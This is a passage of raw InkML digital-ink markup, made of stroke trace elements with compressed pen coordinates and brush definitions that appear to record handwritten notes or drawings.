  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43198.3194">12435 9557,'159'-54,"66"23,80 13,66 2,96-9,16 11,41 15,-21 5,-43 12,-67-1,-99 7,-74 15,-60 28,-81 20,-67 42,-42 44,-1 44,17 58,12-14,-20-6,-52-40,-85-70,-143-65,-77-63,-126-42,-76-6,-114 18,106 26,59 18,170-6,114-22,117-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45046.5042">15093 7320,'-4'2,"-20"9,24-11,0 0,-56 18,56-18,-56 31,30 1,47 6,45-8,13-18,-26-25,-33-18,-48-9,-35 1,0 13,1 24,29 22,26 4,24 7,32-16,20-13,11-22,6-22,23-27,11-20,34 1,51 6,47 14,40 24,46 25,22 34,15 48,0 41,-43 35,-83 23,-57 27,-14 54,0 45,-22 28,-60 14,-96-31,-81-19,-40-17,-34-11,-25-45,-25-42,-26-30,40-43,67-20,43-27,39-24,29-30,31-48,21-45,35-11,17-15,-15 0,-17 17,-6 32,-15 28,-41 22,-33 28,-43 45,-34 34,-3 19,14 13,23 14,59-5,68-4,57 8,51 10,10-4,-24-23,-59-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="47290.7286">5775 10443,'-42'40,"-35"16,3 14,43-19,29-25,37-10,16-22,8-25,-25-12,-30 2,-28 12,-24 9,-4 19,20 4,36 14,38 0,52 2,29 2,8-3,-4-3,-18 4,-28 15,-15 26,24 39,10 34,37 39,34 23,68 33,27-24,68-6,33-33,30-29,12-32,3-38,10-29,47-25,18-19,40-11,45 1,57 8,42 11,60 5,-13-7,-9-14,37-19,-63-11,-17-7,-40-9,-13-28,-56-34,-76-32,-31-35,-71-39,-67-69,-61-36,-40-48,-39 65,-22 42,-26 42,-32 35,-33 81,-36 71,-10 64,6 91,-6 65,-1 25,8-1,4-32,10-67,-11-82,-3-82,-15-106,-32-33,-21 11,-19 51,-21 28,-43 42,-38 15,-35 25,14 33,46 26,38-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="48376.8372">20838 6575,'-12'147,"-27"57,5 64,-13 22,-5 32,4-31,20-44,36-46,12-106,7-62,30-41,56-38,48-25,64 34,57 20,62 28,32 32,23 22,5 63,-12 10,-54-16,-36-7,-71-48,-53-23,-66-75,-50-52,-33-64,-17-55,-15-48,3-74,-3 24,-5-31,6 66,4-1,3 84,1 11,-7 81,-20 78,-42 3,-76 50,-66-5,-102 20,-64-64,-94-29,-35-7,21 32,39 30,31 5,53-2,69-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49857.9853">18749 1335,'14'128,"-24"55,-19 49,-14-1,-2-16,17-19,17-23,9-37,4-31,7-29,27-36,59-16,60-20,66-4,65 8,55 10,44 23,47-5,-8 11,12-17,-48-12,-31-39,-67-15,-42-21,-46-10,-58 1,-48-3,-47 6,-38-23,-29-4,-21-32,-32-7,-23-29,-25-21,0 12,-26-1,-15 15,-33 19,-35 33,-19 26,-51 4,-9-3,-55 23,-27 35,31 59,25 31,24 8,2 7,67-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="52051.2046">22561 3776,'-2'101,"-24"88,-9 57,0 0,7-4,10-24,42-24,36-46,27-45,9-48,35-38,42-6,49-17,22 39,15 21,-15-11,-31-5,-46-32,-21-32,-21-16,-24-11,-22-9,-13-42,-29 3,-8-41,-14-32,1-1,-3 24,-27 29,-6 26,-14 21,-28 49,-26 3,-19 30,-53-27,-68-16,-66-38,-51-28,7-2,49 56,40 68,28 47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="79689.9682">5667 11905,'-4'2,"-13"0,17-2,-20-9,23-6,-3 15,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,4-10,-4 10,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-2-1,2 1,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-9 11,9-11,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,1 17,-1-17,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,24 22,-24-22,0 0,0 0,0 0,0 0,0 0,44 14,-44-14,0 0,0 0,0 0,0 0,0 0,0 0,0 0,57 9,-57-9,0 0,0 0,0 0,0 0,0 0,0 0,30-6,-30 6,0 0,0 0,0 0,0 0,0 0,-5-24,5 24,0 0,0 0,0 0,0 0,-31-34,31 34,0 0,0 0,0 0,-56-33,56 33,0 0,0 0,-32-6,32 6,0 0,-12 0,12 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="80329.0321">5098 10586,'48'60,"-7"34,4-13,-17-51,12-29,-8-52,8-58,0-25,-7-36,9 46,-7 36,4 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="82765.2757">22219 7607,'32'49,"-20"24,-12-73,15 83,5-5,8-53,4-29,48-93,22-61,23-58,-22-8,-9 47,-5 39</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="83817.3809">5072 9204,'-1'26,"17"76,-16-102,48 109,18 11,-10-45,-1-36,3-67,-17-59,3-39,-19-42,0 39,8 62,20 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="84330.4322">5055 7772,'53'128,"3"3,-19-54,-14-52,0-36,20-63,-12-43,-3-29,-4 19,8 53,9 6,-14-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85032.5024">14124 7025,'65'104,"1"34,-7-12,-12-40,-8-56,1-59,13-75,8-83,24-34,27-40,-24 75,-14 52</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="85691.5683">14823 10335,'10'45,"1"52,11 30,16-7,-1-33,8-51,-1-61,16-92,12-101,28-71,6-1,-11 76,6 74</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="93806.3797">22042 3609,'125'-108,"4"-11,30 34,54 24,69 14,8 45,62 33,10 64,10 54,-69 74,-32 70,-65 58,-64 20,-86 0,-89 2,-92-40,-92-63,-77-86,-69-96,-90-116,-47-117,-7-88,-18-116,144-19,176-42,171 20,129 105,125 113,110 114,45 94,-129 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="94682.4673">17294 1605,'140'-153,"52"21,76 0,71-13,46 9,37 2,-11 26,35 13,18 21,14 26,37 66,-17 68,-10 83,-17 88,-69 77,-110 44,-136 15,-118 0,-107-42,-130-47,-122-79,-112-60,-66-78,-46-36,-48-46,-14-60,-41-65,24-71,-5-81,165-36,121-39,129-15,168 61,215 31,217 98,134 113,50 115</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="95549.554">19879 2308,'19'-9,"-29"9,10 0,0 0,0 0,-48 1,48-1,0 0,-75 21,75-21,-80 50,35 15,54 5,39-22,16-25,-8-35,-25-30,-11-15,-6 23,-7 31,26 34,15 70,-18 22,-13 4,-32-40,-27-44,-22-36,14-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="95956.5947">20268 2487,'21'-10,"-48"-6,27 16,0 0,-80-11,80 11,-91 5,38 24,43 14,53-2,32-8,-12-33,-14-33,-22-7,-14 6,-4 28,21 32,-3 47,-16-3,-11-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="96097.6088">20478 2701,'43'-38,"-13"-8,-30 46,20-33,-8-17,5 1,22 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="96564.6555">20984 1875,'6'67,"5"70,0 46,0-5,3-43,16-52,3-60,-5-31,11-49,-10-20,7 35,-1 63,3 59,-37 19,-27-28,-32-30,0-34,17-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="96925.6916">21513 2534,'20'15,"-27"15,7-30,0 0,-29 52,29-52,-31 48,13-4,29-24,12-14,17-19,-9-17,-20-11,-7 7,-1 31,7 33,7 20,-2 1,-11-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="97539.753">21849 2540,'5'-2,"-24"14,19-12,0 0,0 0,-40 38,40-38,0 0,-27 50,27-50,-7 54,45-9,0-19,6-13,-15-6,-6-1,0 36,-22 10,-15 9,-19-31,1-17,29-18,34-42,30-22,21-21,-21-23,-49 29,-38 12,-26 11,-13 48,25 31,47 23,78 36,72 13,-9-39,-38-8,-45-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="174681.4664">17397 2362,'7'0,"-15"7,8-7,0 0,-22 22,22-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="174832.4815">17585 2935,'19'30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="174968.4951">18003 3464,'27'14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="241742.1718">1488 2806,'-18'113,"-27"90,2 27,7 60,6 58,14 31,10 84,6-11,-2 44,11-1,5 12,4-128,3-52,5-96,-8-103</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="242329.2305">3282 2840,'-2'73,"-16"57,-11 92,-16 48,0 67,0 74,-8 1,-26 53,-14-15,8-9,22-3,12-35,-11-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="242952.2928">4511 12211,'-6'36,"-17"44,23-80,-19 117,-1 19,-1-5,9-19,13-29,-7-48,7-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="243184.316">4753 12357,'-2'-29,"-51"6,53 23,-111-18,-26 12,12 13,44 16,32 0,33-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="244101.4077">4697 12784,'-4'72,"-9"1,3-29,11-16,-1-26,3-38,7-28,6-25,-4 5,14 44,4 25,10 36,14 31,-6 12,-5-10,-1-23,-1-18,-3-20,-14-15,-7-11,-34-12,-13 20,-9 27,16 34,6 21,26 8,26-6,6-29,14-23,0-34,16-22,-15-5,-38 9,-16 34,-13 17,-8 21,-5 17,7-2,17 0,20-18,4-20,14-23,-1-3,-5 5,-1 24,-7 17,-13 8,1 2,-13-11,3-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="244542.4518">5650 12754,'-8'-1,"-26"19,34-18,0 0,-23 59,23-59,-22 93,22 16,14-44,18-37,8-38,-1-43,-8-48,-25-7,-31 2,-9 38,23 56,22 35,23 62,28 37,4 10,6-21,13-25,6-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="244793.4769">6522 12559,'3'35,"-4"93,3 38,12 11,11-23,-10-41,-5-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="245584.556">1178 8181,'-5'62,"12"12,11 29,-11-6,-4-10,1-32,6-18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="245820.5796">1291 8112,'-8'0,"-47"20,55-20,-65 31,2 0,-7 5,13 15,6 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="246627.6603">1343 8168,'-14'-19,"8"30,6-11,0 0,1 50,-1-50,9 97,8 23,7-19,-4-43,-4-20,-2-41,7-39,8-29,-13 8,4 67,13 44,-2 6,-20-13,8 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="247091.7067">1723 8613,'7'-4,"-10"-22,3 26,0 0,-22-55,22 55,-16-79,18-2,14 41,4 15,26 36,9 6,8 23,-3 1,-8-25,-24-17,-18-18,-23-12,-14-11,8 37,3 15,8 31,10 26,17 2,17-24,11-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="247470.7446">2339 8364,'-17'-1,"-7"21,24-20,0 0,-26 39,26-39,-5 64,2-29,14-12,-2-22,-5-28,7-19,-4-4,4 37,19 40,1 13,-11 10,-14-28,-2-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="247963.7939">2663 8244,'4'1,"-39"18,35-19,0 0,-66 24,66-24,-67 41,33 36,33-8,44 5,3-31,-5-20,-7-50,-9-37,-9-40,-25 15,-6 25,6 28,9 38,4 56,18 61,0-1,10-12,-5-55</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="248649.8625">2910 8057,'6'-53,"1"14,-7 39,9-48,15 33,14 30,10 41,11 39,-17 12,-39-10,-24-14,-9-13,6-45,16-18,17-12,33-15,45-16,12 11,2 23,-28 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="249195.9171">2660 6885,'-21'10,"-63"28,84-38,-123 42,-32-6,-27-22,-5-9,25-19,33 5,-6 0,19-17,47 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="249556.9532">2601 6139,'-65'52,"-67"11,-40-9,-54-19,7-6,-9-19,50 2,28-11,82-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="249886.9862">2768 5545,'-77'-5,"-96"9,-59 10,-28-4,-30-8,25-8,48 14,68-33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="250267.0242">3028 4280,'-29'3,"-96"22,-86-17,-57-4,-44-8,30-13,13-7,75-11,85 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="250570.0545">3429 3385,'-116'-40,"-130"36,-84-4,-16-2,-7-11,50 24,52-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="252574.2549">2341 4915,'5'-4,"-15"6,10-2,0 0,0 0,-22 2,22-2,0 0,-31-3,31 3,-28 2,6 0,22-2,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-11 16,11-16,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,10 21,-10-21,0 0,0 0,0 0,0 0,0 0,0 0,0 0,33 16,-33-16,0 0,0 0,0 0,0 0,0 0,0 0,52 23,-52-23,0 0,0 0,0 0,0 0,0 0,31 9,-31-9,0 0,0 0,0 0,0 0,2-17,-2 17,0 0,0 0,0 0,-25-45,25 45,0 0,0 0,-51-40,51 40,0 0,-54-17,54 17,-32 18,27 31,17-1,18-1,0-22,-13-14,-9-15,-4-9,8-15,18 7,16 16,33 16,36 28,21 25,22 6,25-11,49-6,15-21,18-18,-8-26,-9-31,-9-49,-10-28,-14-33,-34-18,-14-31,-34-2,22-14,22 12,46 32,54 16,60 50,104 30,79 42,55 37,3 27,43 1,-11 0,0-1,-16-8,10-2,-34-7,9-2,-20 6,1-7,-61-14,-1-7,-7-20,-51-21,-14-31,-36-6,-22 4,-10 18,-20 4,-28-15,-37-9,-46 4,-51 7,-34 12,-47 19,-38 20,-41 21,-15 13,-32 51,-16 33,-21 0,14-27,13-21,32-31,19-13,32-31,21-26,16-23,-34 22,-19 17,-27 15,-31-13,-48 1,-47-26,-50 2,-76-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="254707.4682">2781 3727,'-7'6,"-14"10,21-16,0 0,0 0,-19 16,19-16,0 0,-2 14,2-14,-3 6,-6-6,9 0,0 0,-23-7,23 7,-46-5,-64 18,-2 8,57 16,51 18,42-3,-3-26,-9-30,-35-26,-25-27,-4 1,9 24,38 29,56 23,61 41,30 17,44 5,40 1,57 12,28 0,44 34,-13-28,50 12,44 3,83 19,12 13,7 11,-41-9,22 9,-61-23,-17-12,-55-34,-43-32,4-13,-30 9,-4 14,-13 3,-81-20,-38-13,-34 8,-33 19,-39 11,-50-17,-31-10,4-3,5-11,4-3,-4-10,0-21,3-19,-2-29,3-31,-2-22,-13 26,-12 19,-8 19,4 33,-2 28,15 43,7 24,-6 7,-39-10,-40-45,-37-37,-11-24,14-3,2-4,-11 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313069.3038">5457 13611,'-6'-26,"-13"-24,19 50,-11-50,-1 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313228.3197">5261 13042,'-18'-66,"14"18,4 48,0-60,-7-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313373.3342">5136 12505,'-3'-62,"-1"-9,4 71,-12-71,-13-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313523.3492">5049 11818,'22'-72,"-8"-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313651.362">5103 11114,'15'-105,"-6"0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313816.3785">5205 9904,'27'-184,"-29"-3,-10 4,9 10,9-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="313987.3956">5344 7775,'5'-198,"-19"33,1 10,2 8,17-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="315729.5698">20137 1007,'93'-49,"-24"11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="316694.6663">22435 754,'277'24,"-14"20,-15 23,-17 54,-3 56,-57 18,-60 34,-11 24,-26 0,-47-24,-50 27,-49-12,-50-23,-48 0,-41-77,-68-34,-57-36,-54-23,15 14,-7 6,-68-4,6-38,-27-23,28-19,-6-15,24-38,26-52,59-58,21-86,87-42,65-27,23-38,57 21,45 17,64-9,61 51,86 43,101 22,80 60,78 59,122 47,68 63,46 53,93 75,-36 66,-56 50,-29 69,-147 22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="319504.9473">3782 12071,'-11'93,"9"48,6 19,11 24,4-34,7-36,-20-44,-13-27,-9-29,5-13,16 2,46 13,66 23,81 24,50-8,49-2,52 3,16 2,5-11,10-9,-63-27,-84-17,-78-18,-71-10,-37-9,-32-15,-19-9,-20-30,-13-54,5-34,21 22,14 42,-7 38,-49 20,-47 8,-55-3,-32 16,-59 20,-37 35,-39 22,-49 11,34-5,58-11,39-6,73-8,45-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="320646.0614">3329 7781,'7'0,"-1"42,-6-42,0 0,-3 79,3-79,-13 126,23 87,14-25,-2-18,-5-13,-13-34,-20-35,-30-22,-49-30,-70-33,-70-5,-26-6,-29-7,-8 13,-27-2,40 3,51 10,74-3,65-37,57-13,18-31,2-50,4 8,12 10,25-18,28 14,39-3,50 3,61 6,63 12,90-16,22 16,2 12,-8 31,-105 42,-82 33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="361404.1368">8897 10905,'3'39,"4"70,-2 17,4 1,-5-32,9-34,-7-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="361644.1608">9061 10887,'36'-26,"-37"24,1 2,0 0,0 0,-40 5,40-5,0 0,-100 28,100-28,-119 41,4-10,28-9,16-16,43-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="362387.2351">9149 10744,'1'-5,"-14"65,13-60,15 128,24 44,-5 12,4-46,-11-50,-13-54,-6-46,-10-62,4-44,9 5,17 70,18 51,5 60,-23 27,-10 9,-16-26,-1-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="362937.2901">9652 11500,'41'19,"-37"-7,-4-12,0 0,0 0,-1 2,1-2,0 0,-13-12,13 12,-21-52,15-19,6 71,9-74,9 30,24 38,-1 28,3 19,-14-9,-4-6,17-11,2-15,2-19,-20-14,-18-7,-38 3,-10 26,1 36,7 36,25 16,20 1,30-28,18-22,4-39,5-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="363278.3242">10298 11327,'-12'1,"-24"17,36-18,0 0,-46 34,46-34,-48 52,38 7,34-14,26-17,4-28,-8-26,-9-9,-21-2,-11 27,0 18,8 35,0 6,13-4,8-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="363729.3693">10688 11463,'16'-66,"-34"8,18 58,-44-41,-21 24,14 37,12 48,36 27,39-5,18-36,-7-42,-14-56,-18-57,-23-35,-29-33,-18 29,31 71,29 61,19 52,30 107,5 74,-25-42,-10-36,3-72,4-63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="364307.4271">11248 11064,'-12'-33,"-10"7,22 26,0 0,0 0,3-14,-3 14,0 0,21-3,-21 3,54 24,3 23,-57-47,59 69,-33 3,-32-14,-27-12,-9-28,14-15,30-8,37-7,30 8,26 36,-9 33,-23 34,-57 10,-53-31,-53-33,-52-27,-9-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="365145.5109">11339 10624,'-115'-25,"-59"2,-32 13,-45 8,-42 6,-31 5,-13 0,-2-1,60-4,50-12,25-8,67 6,64-1,63 6,24 3,16 12,-4 9,-22-7,-4-2,-22-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="366407.6371">9300 9108,'2'-13,"-14"12,12 1,0 0,-37 4,37-4,-44 19,-13 29,5 39,16 28,42 6,34-31,30-27,18-32,-4-34,-15-44,-24-30,-34-24,-38 37,-11 38,-15 24,9 20,2 6,7 3,31-15,23-6,27-16,19 3,13 12,-6 16,-22 16,-18 25,-28 14,-9-6,7-21,7-36,-2-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="366928.6892">10019 9202,'-21'-6,"-15"-1,36 7,0 0,-39-2,39 2,-51 7,-12 18,2 28,13 38,24 16,43-6,50-21,16-38,15-35,-5-34,-25-25,-35 1,-38 5,-22 7,-5 9,8 14,14 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="384324.4286">8852 9814,'3'-42,"-51"-2,48 44,-91-43,-26 5,-16 20,-19 27,9 33,7 39,8 27,6 36,34 17,35 2,27 21,30 4,30 7,33 23,-7-12,-32-9,-37-10,-25-51,-14-45,-5-34,-13-22,-23-28,-14-17,-10-19,23-7,19 2,13 11,-19 8,-18 5,8 5,31 7,38-3,26-1,39-3,50-5,13-15,-11 3,-55-2,-38-5,-36 4,-38 4,-14 27,2 20,20 20,30 15,33 16,40 17,23 0,-10-24,-24-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="385559.5521">6902 11617,'41'-54,"-11"4,-30 50</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="385804.5766">7112 11306,'30'-56,"-22"-13,-8 69,-4-78,4-22,17 14,7-3,2-8,-14 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="385998.596">7244 10253,'24'-89,"1"0,-17-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="386149.6111">7346 9366,'30'-103,"-28"14,-10 11,0-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="386312.6274">7452 8423,'37'-103,"-27"16,-5-6,-1 9,0 14,16 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="390338.0299">6070 9430,'83'14,"-32"-4,-30-14,-18-35,-30-26,-9 27,10 26,13 46,2 23,13-4,2-34,12-19,5-18,-9-15,-26-9,11 23,17 14,38 20,30 3,39-2,27-13,44 6,20 15,-2 25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="390496.0457">8165 9515,'192'-57,"-11"0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="390672.0633">10206 9086,'234'-56,"-23"-13,-27-14,-6-5,-11 1,-17 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br2" timeOffset="391029.099">11880 8333,'11'-2,"-29"30,18-28,0 0,-35 66,35-66,-52 92,-15 17,16-31,34-31,28-35,31-39,13-31,-5-39,-21 6,-28 30,-47 14,-64 5,-87 0</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45:26.368"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#7030A0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">6348 4825,'60'-3,"37"-3,21-4,25-6,12-3,45-1,7 8,37 13,-25 14,-48-9,-6-10,-40-15,-11-6,10 9,22 22,9 10,0 0,-2 0,0-4,16 1,7 6,3 13,3 7,-28-23,7-21,14-12,1-8,17 12,44 16,1 6,-6 4,6-10,-19-15,-19-7,16 3,11 19,1 17,16 10,-37-15,-17-20,7-14,0-5,2 7,9-2,-2 2,-8 4,26-4,-3 6,2 3,20 4,-27 6,7 12,-20-3,-3 4,-45 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14973.4972">21355 6916,'0'-22,"4"3,-4 19,0 0,0 0,-1-6,1 6,0 0,-7 0,7 0,-31 1,-47-23,78 22,-104-24,3 4,-3 22,11 15,6 17,20-8,12-9,18-22,1-5,-18-13</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7:38:33.306"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5466 2917,'-35'-23,"-45"3,80 20,-119 7,-5 13,24 18,17 24,42 4,53-5,79-4,67 1,40 15,-15 14,-52 2,-90 2,-93-18,-83-23,-51-24,42-21,64-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="425">5930 3022,'6'5,"-17"59,11-64,6 100,12 15,21-7,32-15,12-36,16-44,-5-51,-30-44,-4-50,-27 8,-29 40,-13 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1114">7357 3009,'-17'-7,"-50"-5,67 12,-125 13,-25 24,29 35,72 31,77 4,46-15,22-38,3-44,-9-56,-22-65,-39-68,-37-65,-49 40,-20 20,19 29,16 69,37 60,2 64,38 101,7 65,16 32,1-13,-25-33,-14-10,-4-53,15-55,2-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1547">8152 3076,'3'-41,"-37"24,34 17,0 0,-56 20,56-20,-68 53,-6 29,27 18,36 16,40-29,49-8,51-45,9-47,-14-63,-32-82,-91 15,-48 38,-53 19,-33 40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13187">10571 2772,'2'5,"2"23,-4-28,0 0,13 68,-13-68,17 129,5 18,-20-17,-5-45,-1-69,-10-72,-3-75,1-10,29 7,37 32,48 38,32 34,9 27,-66 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14387">11214 3272,'8'-18,"12"-6,-20 24,0 0,33-33,-33 33,75-44,1 9,-12 5,-12 0,-20-8,-22 1,-16 12,-18 14,0 11,10 18,7-3,5 0,1-4,-7 2,-9 3,-6 1,12-6,12-2,11 28,14 45,-19 44,-22-1,-16-58,10-41,7-24,-6-44,-16-38,15-28,3-16,50 9,22 22,5 35,-6 31,4 50,22 80,-11 26,-25-13,-16-24,-15-30,-3-43,5-37,0-63,-5-55,3-19,29 27,14 59,16 62,7 59,-4 79,-20 23,-24-25,-10-35,3-43</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14809">14072 2654,'-16'0,"-34"18,50-18,-82 34,-28-6,-22-16,39-14,45-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15186">14769 1928,'-49'-25,"-40"20,2 47,11 52,44 40,39 24,13 28,0-13,-19-28,-22-28,1-58</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15361">14708 2758,'32'-3,"-83"-1,51 4,-153-22,-85-13,-16 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16686">14586 2701,'83'-9,"-11"9,-48-6,-47-25,-92-62,-76-42,-23 7,24 47,105 98,129 110,148 118,28 24,-123-81,-191-91,-196-140,-135-103,-94-39,92 63,155 88,167 96,154 95,69 47,-79-34,-178-97,-157-112,-149-79,-17-7,93 59,163 80,175 71,134 65,79 27,-40-41,-104-85,-84-65,-99-86,-21-43,15-28,129 43,172 29,202 47,130 46,179 31,-51 9,-9-4,-38-12,-82-23,-132-39,-178-52,-235-10,-175 22,-143 84</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20143">10450 4066,'18'-7,"8"-6,-26 13,0 0,51-20,-51 20,60-28,9-10,-17-1,-38-6,-42 6,-46 37,-14 37,-13 38,23 19,59 10,81-13,47-17,34-32,-26-37,-29-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20833">11280 4266,'29'56,"-10"-35,-19-21,0 0,0 0,17-11,-17 11,0 0,28-61,-28 61,24-89,4-6,8 40,-6 43,22 48,-1 24,-13 1,-14-29,-3-34,4-36,-6-37,5-5,13 28,-6 44,14 53,-20 39,-11 11,-16-36,3-29</inkml:trace>
